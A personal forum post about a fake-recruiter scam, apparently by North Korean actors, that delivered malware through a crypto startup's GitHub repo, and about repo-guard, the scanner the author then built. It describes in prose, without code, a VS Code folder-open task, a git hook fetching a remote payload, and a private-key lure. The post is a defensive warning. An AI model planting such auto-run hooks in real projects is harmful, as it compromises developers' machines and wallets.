I was (likely) targeted by North Korean hackers, so I found the payload and reverse-engineered a security tool.

A recruiter contacted me on LinkedIn on Wednesday. CEO of a crypto startup, $125/hr advisory role, review our product via GitHub repo as the first interview step. The social engineering was top-notch, polished profile with 500+ connections, days of back and forth DMs, the cracks only appeared in hindsight.

Friday, I got access to the repo, which felt like a win. With a healthy amount of skepticism, I reviewed the repo with Claude. The codebase looked professional and complete, the README was well structured, and the .json files where malware would normally be hidden came back clean. The payload was buried well enough that Claude and I missed it. Luckily, I decided to enjoy my Friday night and not clone the repo.

This is the main reason I want to share my story here: many of us are starting new businesses, and when someone offers you a paid role that seems like the perfect fit, your judgment becomes clouded. I know mine did.Having had more time to think, the inconsistencies started to surface. Lying in bed around midnight on Saturday, the eureka moment happened. This was definitely an elaborate scam. I stayed up all night digging through the repo and gathering evidence to file reports. Here’s what I found:

The repo contained a fully operational malware delivery chain:

.vscode/tasks.json configured with runOn: folderOpen — silent code execution the moment you open the folder in VS Code, zero prompt.
.githooks/post-checkout buried under 40 lines of decoy comments, downloading and executing a remote payload from a Vercel server across Mac, Linux, and Windows simultaneously, all output suppressed.
Private key social engineering via the .env.local README instruction, a backup vector in case the malware delivery fails or gets caught
This is a complex attack chain designed to pass pre-clone inspection. Once you clone it, you’re cooked.

I stayed up all night gathering evidence and filing reports: Vercel - both domains, GitHub - account + repo, LinkedIn profile, Basescan wallet flagged, Neynar/Farcaster. Then the big guns: RCMP/CAFC and FBI IC3. But then I started thinking, what tools should I have used to protect myself in this situation?

From my research: not Snyk, not Socket.dev, nor npm audit checks .vscode/tasks.json for auto-execution nor .githooks for hidden payloads. These are documented attack vectors with zero accessible defensive tooling. So I designed one.

Before any code was written, I produced a full PLAN.md: module specs, data models, dependency decisions, phased build order, and explicit quality gates. PLAN.md went through multiple design and vetting stages to become NORTHSTAR.md for my coding agent. Every phase ends with a pytest run. If tests pass, commit and move to the next phase. If something breaks, roll back to the last commit and fix it before proceeding. No exceptions.

I'm not running a swarm of agent windows and accepting whatever they output. The agents are the implementation crew, and they work from a locked spec with checkpoints I control.

The workflow:

Claude - brainstorming partner, project management, agent prompts
Kimi - research tasks, security audits between phases, pytest design vetting
DeepSeek - code implementation, using NORTHSTAR.md as the source of truth
Pytest after every phase - nothing proceeds unless all tests pass
Git commits as checkpoints - passing stage gets a commit, every breaking change gets rolled back

The tool is called repo-guard. It scans GitHub repos via API; no cloning, no execution, and flags trust score anomalies, VS Code auto-execution, git hook payloads, and IOCs with optional VirusTotal enrichment. 184 pytests to ensure no breakage.

https://github.com/WBChain3/repo-guard

I was targeted by a sophisticated threat actor pretending to offer strategic advising work. This attack is consistent with documented North Korean Lazarus Group developer recruitment campaigns. It was good enough to fool me and an AI assistant doing active due diligence for two days. If you're early in this journey and someone sends you a repo to review: do not clone it. Slow down, scan it first and above all else, TRUST YOUR GUT!

I’ve been coding with AI for about 7 weeks. This is one of my first public repos, and any feedback is greatly appreciated. Happy to answer any questions about the attack chain, share screenshots of the malicious code, whatever you'd like. If you made it this far, thanks for reading and good luck on your development journey.

23 comments